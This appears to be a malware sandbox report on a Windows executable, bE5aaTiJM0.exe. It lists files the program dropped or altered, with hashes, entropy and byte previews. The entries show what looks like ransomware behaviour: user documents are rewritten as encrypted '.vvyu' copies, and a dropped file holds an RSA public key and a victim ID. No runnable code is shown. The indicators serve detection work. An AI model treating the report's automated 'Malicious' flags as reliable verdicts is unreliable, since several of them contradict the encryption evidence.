MD5:	4556CF625658B0008817BBC7ACD4977E
SHA1:	CCE1F6B6207B0E0ADE6D923E6C4BF013D505C1C7
SHA-256:	D0F9FDB6DE503A717BB494BDE897F9B11DE38AD42A16CD00314A38D90F8F7602
SHA-512:	EF108C6EC5A68C45DE2D4E0C19916332FB8FA1C5D5A62201AC34B1EFDB0E342E62D0D15BC3A68152FBD6F5A6F5B7A662C8218591E49B57FF74D9B2A26C9AD242
Malicious:	false
Reputation:	low
Preview:	2019/.2 .mi.d,.[........f....H.\|...W@;...#Wy.....S.DQG....t~6r+....}{..bShrwf....R.LZf....m~.-.Z..:.J.At.y....22..3=..K4.0Z]....4....q.".VZF.....d...Z.....g...n(.T.+mV.mD.F5+..>.DwXb..._........v.{....W-..Q.Z.....O..9.h.....6.Pp.-.\.77..O.lj..4.o.......x.\|fC18.p8{-F..k.\|:*.3..O.1i"'.%..-H.u..<.YU....G...v....e.e...M.<}.vO-.=...2y#.=.b....c..g.....6=?..!k.Y....S._p0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\7D5KIW2V\www.msn[1].xml

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	347
Entropy (8bit):	7.2647723039529595
Encrypted:	false
SSDEEP:	6:3hb6lrc4LmRq6P9Yew5+fwZqKwibyrqqK1mKho4PX2e7jHqH6yLrQCdIyocksciD:3N6lrXL/6POq9imK1mKn/28rgQQksciD
MD5:	87DE54805C9939D406CC3E86612FACB6
SHA1:	88B567C9748B3294EECF751AE600A515111E659F
SHA-256:	15AF2AE64D935A611BB9E29A0DC6BF56D9FA5DD3DF92DE9BB33CC2B9EB0383FB
SHA-512:	469512B6D5DB2746724E10361327B3112209EAF2F38DD54C2301096ED17A01F5344C07C6A757C43ACC71EDFBD67ED9539C27587C50AB1294C28DD44E77038183
Malicious:	false
Reputation:	low
Preview:	<root.`+?..T.g.....M...vw^.ZK.(.\.tp.1)q....A.Q.a.:.....u.C...q.......Q.k..Q....cAA.q.....2...-...!e..._..;k3..%;...n....I,....9.Ooi.a@T..e7.......B..q..Y.s..$....)...Z..c.Blc..{...\..wo.DNc,....Q.Q..q...+..,,...7...~....2"_.V.^.....A...,...54m._..R8.&0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\7D5KIW2V\www.msn[1].xml.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	347
Entropy (8bit):	7.2647723039529595
Encrypted:	false
SSDEEP:	6:3hb6lrc4LmRq6P9Yew5+fwZqKwibyrqqK1mKho4PX2e7jHqH6yLrQCdIyocksciD:3N6lrXL/6POq9imK1mKn/28rgQQksciD
MD5:	87DE54805C9939D406CC3E86612FACB6
SHA1:	88B567C9748B3294EECF751AE600A515111E659F
SHA-256:	15AF2AE64D935A611BB9E29A0DC6BF56D9FA5DD3DF92DE9BB33CC2B9EB0383FB
SHA-512:	469512B6D5DB2746724E10361327B3112209EAF2F38DD54C2301096ED17A01F5344C07C6A757C43ACC71EDFBD67ED9539C27587C50AB1294C28DD44E77038183
Malicious:	false
Reputation:	low
Preview:	<root.`+?..T.g.....M...vw^.ZK.(.\.tp.1)q....A.Q.a.:.....u.C...q.......Q.k..Q....cAA.q.....2...-...!e..._..;k3..%;...n....I,....9.Ooi.a@T..e7.......B..q..Y.s..$....)...Z..c.Blc..{...\..wo.DNc,....Q.Q..q...+..,,...7...~....2"_.V.^.....A...,...54m._..R8.&0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe

Download File

Process:	C:\Users\user\Desktop\bE5aaTiJM0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	747520
Entropy (8bit):	7.842662742823055
Encrypted:	false
SSDEEP:	12288:nCqmkJm0QpmFRBBAw356C94EnhtoLWBEmlCW85h1bmyA5qKyr3ty+SqOhUII84ko:n410QpmfBB5UEnhtjroWW/Hro+TICktO
MD5:	5FAE11A9DDB49452B6896FD3217E9665
SHA1:	A642378099D0AC4E1DC3E0ABE98B12BEE1992E1D
SHA-256:	12471D61DC844208BDBE23A9749980CF1A40AD45F844449AFE55FB0F1CBBDA0B
SHA-512:	8244571AB072B89FE10C6C8A78B0F3B62C6833054D40B327C51583CC247D1E13F8DBF4E8367CE3672A5C5C14DE8B53FCC7969BB6D78F4232EBEBE77D460768AC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ADS. .. .. ..V... ..V... ..X... .. +.` ..V... ..V... ..V... .Rich. *.........................PE..L..."V.`.................^..........@........p....@..................................s......................................\|b..<.......h........................... ...............................`6..@............................................text...^].......^.................. ..`.data....a...p...0...b..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\bE5aaTiJM0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\get[1].htm

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	561
Entropy (8bit):	5.98515533528851
Encrypted:	false
SSDEEP:	12:YGJ68tJgjMwilsclN1PT9zzERMKaK7pbYMfWs55Ye4:YgJQj5ilpZcRMFK7ZfWs5y1
MD5:	E28EA360ADF843B25857121C75727222
SHA1:	3057D351207FC31F4ADB043DF329F7EE9D452F6C
SHA-256:	95216732A5BBBA1CC2D2A814ABDA7C656A0411280AE954474A0ABC2F63D2678E
SHA-512:	63010028C7C239D29048A4EEED91614FA13E276E42BB8B851583106F401F3630BFA69E1DDAC4A4D49CC2B71AB2CA690D746CD6788A680278AF63324AEA92F018
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0WwY79IFZHZrRTX+vM3Y\\n8vLG5Fnx04RdRkdPzflUpeIp+QciBK3E+9VTqWRNYgX7ZXz1zQ1a8RYyZS57f+G7\\no5ou33dQpTxjxaokVKMxSGDR7G7t2F+PjWGtcHWfu\/QEkGHsncNheEAky6zLik2o\\nM1lYi33LUE8aALATOcdYB5QhLJd1ScsJ3c4\/uYr4EpaMSkIiyi\/PSyExYcKuB9cG\\ncc+8IPQv3D\/OjBHprAVJz1i+hPzn24maQ77r60n49y\/S3kPh58U7BRGaqwoCj+TZ\\nvVl+uzb++io3bEdL+ynNOPPz+\/FKvSWzNUR+uR+jQrJ36dhsqnTsto\/RELO4Rj5h\\nKQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA"}

C:\Users\user\AppData\Local\bowsakkdestx.txt

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	561
Entropy (8bit):	5.98515533528851
Encrypted:	false
SSDEEP:	12:YGJ68tJgjMwilsclN1PT9zzERMKaK7pbYMfWs55Ye4:YgJQj5ilpZcRMFK7ZfWs5y1
MD5:	E28EA360ADF843B25857121C75727222
SHA1:	3057D351207FC31F4ADB043DF329F7EE9D452F6C
SHA-256:	95216732A5BBBA1CC2D2A814ABDA7C656A0411280AE954474A0ABC2F63D2678E
SHA-512:	63010028C7C239D29048A4EEED91614FA13E276E42BB8B851583106F401F3630BFA69E1DDAC4A4D49CC2B71AB2CA690D746CD6788A680278AF63324AEA92F018
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0WwY79IFZHZrRTX+vM3Y\\n8vLG5Fnx04RdRkdPzflUpeIp+QciBK3E+9VTqWRNYgX7ZXz1zQ1a8RYyZS57f+G7\\no5ou33dQpTxjxaokVKMxSGDR7G7t2F+PjWGtcHWfu\/QEkGHsncNheEAky6zLik2o\\nM1lYi33LUE8aALATOcdYB5QhLJd1ScsJ3c4\/uYr4EpaMSkIiyi\/PSyExYcKuB9cG\\ncc+8IPQv3D\/OjBHprAVJz1i+hPzn24maQ77r60n49y\/S3kPh58U7BRGaqwoCj+TZ\\nvVl+uzb++io3bEdL+ynNOPPz+\/FKvSWzNUR+uR+jQrJ36dhsqnTsto\/RELO4Rj5h\\nKQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA"}

C:\Users\user\Desktop\BJZFPPWAPT.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838091898192101
Encrypted:	false
SSDEEP:	24:7S1harhX7g7BAOHV1ZNZO1pAqq1+BL1zmgCAQBOV2V83iQOIASsbD:78aLYBZV1ZeAoBLdmBFOcV83iAmD
MD5:	BFD014A3F34DBE4CD40F7F75519ADD79
SHA1:	81B5FC1CE83D7AA1FB446C8E1075D087E4B77D74
SHA-256:	4C7DF2C80F706EF125844F051BAA8F8AF8F40C965810538BF14F975CCF8871FE
SHA-512:	6161EA8D765DAB935FD05DD718F175DD93F99725BDFBC7626BC6CA181E99083ADE11DA6BD43AD27D1723795F7B428EF321939A31A3C56B17BA2F7C32394529EE
Malicious:	false
Preview:	BJZFP.....z....]..Gp..LP..dU...........!iz.9.t.JH....Z......cM......3.....P.."..[X.?2..}i...>.,..%.Xpb..$i.'9t.....@.....p[eI......a!Y....q.K......q.fU...6N.;.A..I...l.!.....&{....t.W.......S...5..0<H...u.-@..O..^.=..Qu+.B.v?...H/.pG.t......WW.7..9.,.. j...@O~.-e.iYf .3\.k.@.v;.&.....d.8i...N].G...>.....7..).......U....#.K>V..?J...e=K...8k0>}..4. ..\|x.....r5..F...d.x.b......-...w.gx..Xa.d....R5..q.t]o.sd2..p5M7E38}.o6#,Tm..eo..=j..(+...!......1..Vw.Q....o.<B.I.h....#......B...(d;5.."....sW..rw...!.##.>..<.>..-..X...}m...G.."...n....dd.sx../b...$.Tm.;gef.p.".<.......4..M~MC=..0H..#.L..S.O..'.v.}....g....}.].e....._T...W..."e.\|..T:L.^'............k.]..6c.'..<..B.z..o...=p.9]#...@LU\|J7...TD...o.....7!.^..$.p.n.px#..\.Z......N../\|.........M.2.{...&+e@.......c......+m.e..P...F%.foJ..$[.../m.a..=....5.2.b.Z&.g.v.._..To.f9YJ.3..x8.m....7.t.(..);........_...$...sD.X..t..S#39\.&...A....._....L..WgH2R,v.,`.s...<.=..W+..).......ro.9L#.v..j..

C:\Users\user\Desktop\BJZFPPWAPT.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838091898192101
Encrypted:	false
SSDEEP:	24:7S1harhX7g7BAOHV1ZNZO1pAqq1+BL1zmgCAQBOV2V83iQOIASsbD:78aLYBZV1ZeAoBLdmBFOcV83iAmD
MD5:	BFD014A3F34DBE4CD40F7F75519ADD79
SHA1:	81B5FC1CE83D7AA1FB446C8E1075D087E4B77D74
SHA-256:	4C7DF2C80F706EF125844F051BAA8F8AF8F40C965810538BF14F975CCF8871FE
SHA-512:	6161EA8D765DAB935FD05DD718F175DD93F99725BDFBC7626BC6CA181E99083ADE11DA6BD43AD27D1723795F7B428EF321939A31A3C56B17BA2F7C32394529EE
Malicious:	false
Preview:	BJZFP.....z....]..Gp..LP..dU...........!iz.9.t.JH....Z......cM......3.....P.."..[X.?2..}i...>.,..%.Xpb..$i.'9t.....@.....p[eI......a!Y....q.K......q.fU...6N.;.A..I...l.!.....&{....t.W.......S...5..0<H...u.-@..O..^.=..Qu+.B.v?...H/.pG.t......WW.7..9.,.. j...@O~.-e.iYf .3\.k.@.v;.&.....d.8i...N].G...>.....7..).......U....#.K>V..?J...e=K...8k0>}..4. ..\|x.....r5..F...d.x.b......-...w.gx..Xa.d....R5..q.t]o.sd2..p5M7E38}.o6#,Tm..eo..=j..(+...!......1..Vw.Q....o.<B.I.h....#......B...(d;5.."....sW..rw...!.##.>..<.>..-..X...}m...G.."...n....dd.sx../b...$.Tm.;gef.p.".<.......4..M~MC=..0H..#.L..S.O..'.v.}....g....}.].e....._T...W..."e.\|..T:L.^'............k.]..6c.'..<..B.z..o...=p.9]#...@LU\|J7...TD...o.....7!.^..$.p.n.px#..\.Z......N../\|.........M.2.{...&+e@.......c......+m.e..P...F%.foJ..$[.../m.a..=....5.2.b.Z&.g.v.._..To.f9YJ.3..x8.m....7.t.(..);........_...$...sD.X..t..S#39\.&...A....._....L..WgH2R,v.,`.s...<.=..W+..).......ro.9L#.v..j..

C:\Users\user\Desktop\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830830139203693
Encrypted:	false
SSDEEP:	24:sZf28k7tg2XQB6r913Dp9Fzqk8zI/AH5Is7VQtDKdYc8fHMUktKjI4zJdl8sbD:slFk7tHXQA911zqkW1Is5CKLadkSJdl/
MD5:	EBF82CE4C4280BDBA5D33651E6CCE373
SHA1:	D1E19BEF9D0A94C2EEEA22C3C9C2809C96945446
SHA-256:	BFC31E7E74F3BB83645DAB13EB056657537688C70AB2A230F99B66833C42AD28
SHA-512:	3E56DD6D51B2B3746CB54623080CCBCFF34310AF7D2F802F42A74A96F5FD6D87D3B837CA6E029ECDB11B8AF37C6622F633C5706322BAC3D27A5183660CBFE4A7
Malicious:	false
Preview:	BJZFP.Ru..RLfU..1;m.B...H.....8..l$.s.j...].o.W>6=.A.L..,....=.+=.nb...9^.....4...%....0Z9.P..R.)Q..$..4.>..J.....D>0C.2.{[....O`^y...n. ..j....W.Sm.g.H.g.]7.V...1.......l.?{.y2..T4T....gPX)c.@.q.}.mwc..D.2#.........^......,......<\|..F.f7.6...........8..H.j..>..bh.c.[.x.A.'...N......k.....$0.^E...FK...V....".L..Eb.P...i$..M...I.tB)94.d.....u@..In..z.._.......j....._>._.2.IF.%.{.:.....A_+BL.-8..3..(.y1a$..L. e..._..>..p....8.........\|..@4..a......1b.&9.J..A....t...,....w.8..@.t. .u...ub$D...9}gZ=.,..sD...P.@.vq......K)d..Z&O.......EiYv.09;kr2.#.n.......cy>.8....h......5F.E .....l.[v..a....V.I..5......F.D..}.c....{...$........W...X..{e......x.^...".......m>d.....O .T.}.l..9.....9n...=..@l..........K................o].R....{.....O...o......Z.B.K...FcG........N+....(....#...j{Hr.."PL.a`O....h.~.7\..oi.z..T]Ty.UZz...3..m.]V..1.;.>L..`....s ...*...E.N...=0....m.E6G...V.......K.\.S4.'.....I0..N.K...zR../H.`.o..i......C...78....B..d..

C:\Users\user\Desktop\BJZFPPWAPT.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830830139203693
Encrypted:	false
SSDEEP:	24:sZf28k7tg2XQB6r913Dp9Fzqk8zI/AH5Is7VQtDKdYc8fHMUktKjI4zJdl8sbD:slFk7tHXQA911zqkW1Is5CKLadkSJdl/
MD5:	EBF82CE4C4280BDBA5D33651E6CCE373
SHA1:	D1E19BEF9D0A94C2EEEA22C3C9C2809C96945446
SHA-256:	BFC31E7E74F3BB83645DAB13EB056657537688C70AB2A230F99B66833C42AD28
SHA-512:	3E56DD6D51B2B3746CB54623080CCBCFF34310AF7D2F802F42A74A96F5FD6D87D3B837CA6E029ECDB11B8AF37C6622F633C5706322BAC3D27A5183660CBFE4A7
Malicious:	false
Preview:	BJZFP.Ru..RLfU..1;m.B...H.....8..l$.s.j...].o.W>6=.A.L..,....=.+=.nb...9^.....4...%....0Z9.P..R.)Q..$..4.>..J.....D>0C.2.{[....O`^y...n. ..j....W.Sm.g.H.g.]7.V...1.......l.?{.y2..T4T....gPX)c.@.q.}.mwc..D.2#.........^......,......<\|..F.f7.6...........8..H.j..>..bh.c.[.x.A.'...N......k.....$0.^E...FK...V....".L..Eb.P...i$..M...I.tB)94.d.....u@..In..z.._.......j....._>._.2.IF.%.{.:.....A_+BL.-8..3..(.y1a$..L. e..._..>..p....8.........\|..@4..a......1b.&9.J..A....t...,....w.8..@.t. .u...ub$D...9}gZ=.,..sD...P.@.vq......K)d..Z&O.......EiYv.09;kr2.#.n.......cy>.8....h......5F.E .....l.[v..a....V.I..5......F.D..}.c....{...$........W...X..{e......x.^...".......m>d.....O .T.}.l..9.....9n...=..@l..........K................o].R....{.....O...o......Z.B.K...FcG........N+....(....#...j{Hr.."PL.a`O....h.~.7\..oi.z..T]Ty.UZz...3..m.]V..1.;.>L..`....s ...*...E.N...=0....m.E6G...V.......K.\.S4.'.....I0..N.K...zR../H.`.o..i......C...78....B..d..

C:\Users\user\Desktop\BNAGMGSPLO.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866919421056878
Encrypted:	false
SSDEEP:	24:W9F49S7gkDbU0/7M00nevft426/zzi+RTIHQvWMg5MH3RGfFsbD:McSc8UkF2N/zgQv7gdmD
MD5:	3ED06F5F41DB1D4ABACA4CAC40A5EB22
SHA1:	95AA9CFEB8F7B6621C8DE6ED175ACEC99D7EAA36
SHA-256:	518D7ADE357BD2988C716C0DABB637C575FD80760DEEFF5C1D9C2A142A9D6A67
SHA-512:	23B339A561D58170EAC895571BF33C4EBCB7A7659B7FC44DC6BAE39CE754C0B5242D82E9D4D7CB14EEEC0FD1BCF31BB3BAB6AE1D0DD9731486E0CFB01F25A2BB
Malicious:	true
Preview:	BNAGMe.....u......\o._.n.g....I.\|U.9.8g....<.U......M...B.Do#X...:.v'..xO.$..$..T-...DB...... ...B.T.W.....%..@J..........]t...o:.-.P.L[..3..$.W.V..%9..,... .\8......C....../.YO.DT.d.F..(.K..?..,..>..M.R...<J.V%.....o.<.....z..2.h...&!...(.....DM..J.D.xC.o....2......$.v.4............/.............e.}..6....4.........U`N .C.]b.\|.:).I..`..<]..j...<~...R..z\B....P.T{.]].9..R.$.r](.o.;u\1K../hr~.B..J......j...+{.;3..Yl.....9...T3..w[.....B.......V.{<...?.&.3..3......Q....K..F.H.W^_d.U@e....^\.&._....C..a....6ZD.....`.o.z,.kc{~.>.h}.iPd>.T.[..7....m.f.u..w^....m.....v2A..W.w u.`...J+..f....]J..?J..afX..f.f..Rx......9h..y....'.}.f.....x....w.E..Pl.)5.-.Ot%%).E,..J.M.l....e\|>SL.7..m{..i...N....K(:.`...r^..{..g..q.}_.Of.Yz....[....R;.F.......F.9.a..c.`Qo.`y^....Lk;......Z,...$.4>..O.!.^..=.......7..0..n7-k2.L........s.Iu......O9...../hv......a]..@C.yb..]..,..i..{E.)v..'[.e.oZ..x..jA...p#r..x.%..%......qP^{.\.HEd..M4J.#JG.Z.G...`..8y.}..Fvy....

C:\Users\user\Desktop\BNAGMGSPLO.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866919421056878
Encrypted:	false
SSDEEP:	24:W9F49S7gkDbU0/7M00nevft426/zzi+RTIHQvWMg5MH3RGfFsbD:McSc8UkF2N/zgQv7gdmD
MD5:	3ED06F5F41DB1D4ABACA4CAC40A5EB22
SHA1:	95AA9CFEB8F7B6621C8DE6ED175ACEC99D7EAA36
SHA-256:	518D7ADE357BD2988C716C0DABB637C575FD80760DEEFF5C1D9C2A142A9D6A67
SHA-512:	23B339A561D58170EAC895571BF33C4EBCB7A7659B7FC44DC6BAE39CE754C0B5242D82E9D4D7CB14EEEC0FD1BCF31BB3BAB6AE1D0DD9731486E0CFB01F25A2BB
Malicious:	false
Preview:	BNAGMe.....u......\o._.n.g....I.\|U.9.8g....<.U......M...B.Do#X...:.v'..xO.$..$..T-...DB...... ...B.T.W.....%..@J..........]t...o:.-.P.L[..3..$.W.V..%9..,... .\8......C....../.YO.DT.d.F..(.K..?..,..>..M.R...<J.V%.....o.<.....z..2.h...&!...(.....DM..J.D.xC.o....2......$.v.4............/.............e.}..6....4.........U`N .C.]b.\|.:).I..`..<]..j...<~...R..z\B....P.T{.]].9..R.$.r](.o.;u\1K../hr~.B..J......j...+{.;3..Yl.....9...T3..w[.....B.......V.{<...?.&.3..3......Q....K..F.H.W^_d.U@e....^\.&._....C..a....6ZD.....`.o.z,.kc{~.>.h}.iPd>.T.[..7....m.f.u..w^....m.....v2A..W.w u.`...J+..f....]J..?J..afX..f.f..Rx......9h..y....'.}.f.....x....w.E..Pl.)5.-.Ot%%).E,..J.M.l....e\|>SL.7..m{..i...N....K(:.`...r^..{..g..q.}_.Of.Yz....[....R;.F.......F.9.a..c.`Qo.`y^....Lk;......Z,...$.4>..O.!.^..=.......7..0..n7-k2.L........s.Iu......O9...../hv......a]..@C.yb..]..,..i..{E.)v..'[.e.oZ..x..jA...p#r..x.%..%......qP^{.\.HEd..M4J.#JG.Z.G...`..8y.}..Fvy....

C:\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851762841984782
Encrypted:	false
SSDEEP:	24:Gpo9+sgErXJMVkXyik+tffWeDew3IbspJVQQgaldgsbD:Gpo9OIXJMVkXfdUspvdgAgmD
MD5:	CF8FFBB772A3B1547752343A5B2649F7
SHA1:	A767E2A93474F2051663FC2A89E85812194B3147
SHA-256:	BC81752E6501BBD3653B74C3776C99CACD0E7F92C8A2F12DDDC591FC34A9944F
SHA-512:	4DD380211CE80C5EA6131D4BDB1F425EB7AC3B553DFE98C8B8C4E13C69500F5A97535BA114C2490C80632B07D533F970E673CA292851703FA038853DAB51576F
Malicious:	false
Preview:	BNAGM!-....)...V.....,....`.%..A.$.)[.A..a^.7...R.\|D...x.z.Nzi.".\|....y5 .-2...5.N.q.v...+".T..Uvj.....CZu...d..%..2O.._...Q@......U...1...A...~..=...........O..r+..5.O..om...)ix.....g.[...V.$%Rk.'L..aoj..."z....q...j.JQ.0.......k..>a~JL.Z...b.....+\|..c`..i.0.........B..}...f..<..g.oWM......./...N..4...y.8........#.....[..J.ut........4.........p..].....Ss....gq?~...i5..d......f.l<.KN.Y.P~CD...).tY...,.R..p:.v...{..1.~.2..B...;...._/AX.....E....\....d.9.].3......#l.......5..OB.r[..d.C..ASgK.N.j.W}.}~.I.J...u..C3....u.Iz....l)....\|i;H......z`.u.W..2.S..........<..%..LO..:.l.p3..,..{Xh..(Q...s....T}:..{.N+.Fh..'.@...}.................)...A.,....g.j.(.E...L8.)TB.\...[....0..#..10H.Sm.L.O.....#.9..*..GE-......6.Z.F?K._).........:tQ.(..=p.dG)....D.. 2;.f..Z.l.4;FmM....+.:.YTB.Hd..7.S3^.......r...r..].'.w.j.>..m....o6.P....^z.<+...QOz.=......l...%.1$9=...L.P...7..M.\|).....<g.a.u.`8..A....\|e#......{U .A....].#&...I...kF\...\t.,..3+..7.[.#..B.o..W

C:\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851762841984782
Encrypted:	false
SSDEEP:	24:Gpo9+sgErXJMVkXyik+tffWeDew3IbspJVQQgaldgsbD:Gpo9OIXJMVkXfdUspvdgAgmD
MD5:	CF8FFBB772A3B1547752343A5B2649F7
SHA1:	A767E2A93474F2051663FC2A89E85812194B3147
SHA-256:	BC81752E6501BBD3653B74C3776C99CACD0E7F92C8A2F12DDDC591FC34A9944F
SHA-512:	4DD380211CE80C5EA6131D4BDB1F425EB7AC3B553DFE98C8B8C4E13C69500F5A97535BA114C2490C80632B07D533F970E673CA292851703FA038853DAB51576F
Malicious:	false
Preview:	BNAGM!-....)...V.....,....`.%..A.$.)[.A..a^.7...R.\|D...x.z.Nzi.".\|....y5 .-2...5.N.q.v...+".T..Uvj.....CZu...d..%..2O.._...Q@......U...1...A...~..=...........O..r+..5.O..om...)ix.....g.[...V.$%Rk.'L..aoj..."z....q...j.JQ.0.......k..>a~JL.Z...b.....+\|..c`..i.0.........B..}...f..<..g.oWM......./...N..4...y.8........#.....[..J.ut........4.........p..].....Ss....gq?~...i5..d......f.l<.KN.Y.P~CD...).tY...,.R..p:.v...{..1.~.2..B...;...._/AX.....E....\....d.9.].3......#l.......5..OB.r[..d.C..ASgK.N.j.W}.}~.I.J...u..C3....u.Iz....l)....\|i;H......z`.u.W..2.S..........<..%..LO..:.l.p3..,..{Xh..(Q...s....T}:..{.N+.Fh..'.@...}.................)...A.,....g.j.(.E...L8.)TB.\...[....0..#..10H.Sm.L.O.....#.9..*..GE-......6.Z.F?K._).........:tQ.(..=p.dG)....D.. 2;.f..Z.l.4;FmM....+.:.YTB.Hd..7.S3^.......r...r..].'.w.j.>..m....o6.P....^z.<+...QOz.=......l...%.1$9=...L.P...7..M.\|).....<g.a.u.`8..A....\|e#......{U .A....].#&...I...kF\...\t.,..3+..7.[.#..B.o..W

C:\Users\user\Desktop\BNAGMGSPLO\EEGWXUHVUG.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856731817421101
Encrypted:	false
SSDEEP:	24:3zsWD+b8KlR88nnAY5a1BlZwOBSlQPAjdFFq6uWgAHma6L1nApDYeAusR/z+OJ4N:Do8KlR7nnNrOOBq6SaSn0aumPmoEiRmD
MD5:	874FC592236411731EC750988E37163F
SHA1:	BE2627DE4D49181E26E9D366D6DAE432FAA3BE42
SHA-256:	3B28270D511010875205B44FECA658B8BE6FB814D7702229F499CC548BDB6C71
SHA-512:	F34D729028F9F7031157CF5AAEF9732BD66925EBF4EE9B46652A734E6DA7A3A0360C31030E32A3D73B31A783079F0B003B0827AB7F139D3B0AE2DD03B64E3B23
Malicious:	false
Preview:	EEGWXC.^...}...u..-......;...,~..(8j........cF..n......u..g..r>)Dx..)...{...."iN........7...]&........5lV&p.Q..q.w9\|..b..6\|.....\|'N"..a9.. .w...e..P.....q..0-..~...~..k!.~.}.."U!.D]4...[D...<mj..m@..:.n.j.Xc.\..Z...A.../..d...zIxR$..X.6EF..6..J.........o...K.m.4c.Z...>u6.._K..l..jlnT...r.:s.q.J1....;.\}.&..f9..T0>(.:.]dAS.0..,....QTY,..p......::..r.M..!..d..N.:....e\|...6.........q..k...T.E..+_b.....%.X.N.:L.]^IN...c..;c...5G.C)..l..Qk0.T.o..R.d4_..`.V..q1..n..X._.6......N...\.x\.]..=..4d.`..K.......b....U...[..I..#....^......,.A"(......B,....-... /X.y....\...h.t....k......h1..........)..n.e%..\|.cjo2?....M..X].St.j.>.._.[,.P.o......X-...W.lj..=..d...2.zo..F..+>....Z6>.Y..m.9.D.......>...k.H.y..u....:.(..H....;...:.a...U...F9o....[[.J.......";.....2.....m..2 1)n..E.0Yn..x.....Ub&.hL.S.D..."z_...H......"[.U..F.h`.V.{...BY...^. ..Q..!.$...Ia".'...)......[...FH(Z.+.T..@*.....].&s....=.7O....~...yb.'(?.EK...<...V...@.....c.l..r.......m

